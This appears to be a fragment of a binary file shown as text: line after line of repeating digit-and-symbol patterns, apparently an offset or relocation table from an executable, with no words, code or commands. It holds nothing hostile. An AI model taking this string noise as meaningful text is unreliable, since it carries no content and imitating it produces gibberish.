0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1<1@1D1H1L1P1T1X1\1
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4h;p;x;|;
;P=T=X=\=`=d=h=l=p=t=x=|=
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
8$8,848<8D8L8T8\8d8l8t8|8
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
9 9(90989@9H9P9X9`9h9p9x9
2$2,242<2D2L2T2\2d2l2t2
;T<X<\<`<d<h<l<p<t<x<|<
8 80848D8H8L8T8l8|8
9,9094989@9X9h9l9|9
:$:<:L:P:`:d:h:l:t:
;,;<;@;H;`;p;t;
< <$<,<D<T<X<`<x<
= =$=4=8=<=D=\=l=p=
> >(>@>P>T>d>h>p>
? ?0?4?D?H?L?P?X?p?
0 0$04080@0X0h0l0|0
1 1(1@1P1T1d1h1l1t1
2$24282H2L2P2X2p2
3,30343<3T3d3h3x3|3
4 484H4L4\4`4d4l4
5 585H5L5T5l5|5
6$6<6@6X6h6l6
7 7$74787<7D7\7`7x7
8$8(8,848L8\8`8p8t8x8
9(9,9<9@9D9L9d9h9
:$:(:<:@:P:T:X:`:x:
;$;4;8;H;L;P;X;p;t;
< <4<8<H<L<P<T<\<t<x<
=(=8=<=L=P=T=X=`=x=|=
> >0>4>8><>@>H>`>d>|>
?,?0?@?D?H?L?T?l?|?
0,0<0@0P0T0d0h0x0|0
1,1<1@1D1X1\1l1p1t1x1|1
2 2$2(202H2X2\2l2p2t2|2
303@3D3T3X3`3x3
4 4$4,40484<4D4L4d4h4
5,5<5L5\5`5p5t5(<H<P<\<|<
=$=0=P=\=|=
>$>8>@>T>\>d>l>p>t>|>
?4?<?`?t?|?
00080D0t0x0
1(1H1T1t1|1
2 2@2L2l2t2
30383@3L3l3t3|3
4<4D4L4X4x4
585@5L5l5t5|5
6,646<6D6L6T6\6d6l6t6|6
747<7D7L7X7x7
888D8d8l8t8x8
9 9,9L9X9
:0:<:\:d:p:
;$;,;4;<;H;h;p;x;|;
<0<8<@<D<L<`<h<p<x<|<
= =@=L=l=t=
>4>@>`>l>
? ?,?L?X?x?
0$0,00080L0T0\0d0h0p0
1 1,1P1p1x1
2$202P2\2|2
3,343@3`3h3t3
4 4,444L4T4\4`4d4l4
54585H5l5x5
6 6$6(606D6L6`6h6p6x6|6
7 7(7,7D7H7h7
8(8H8h8
9(9H9h9
:,:<:D:T:`:h:
;4;X;d;l;
<H<d<h<
d0h0l0p0t0x0|0
1(2X2h2x2
8 8$8(8,8084888<8H8L8P8T8X8\8`8d8
9<9\9|9
<0<X<
=D=t=
 0h0
1@1l1
2D2x2
3@3d3
4@4|4
5(6\6
6 7P7x7
8 9T9|9
;8;\;
<(<@<
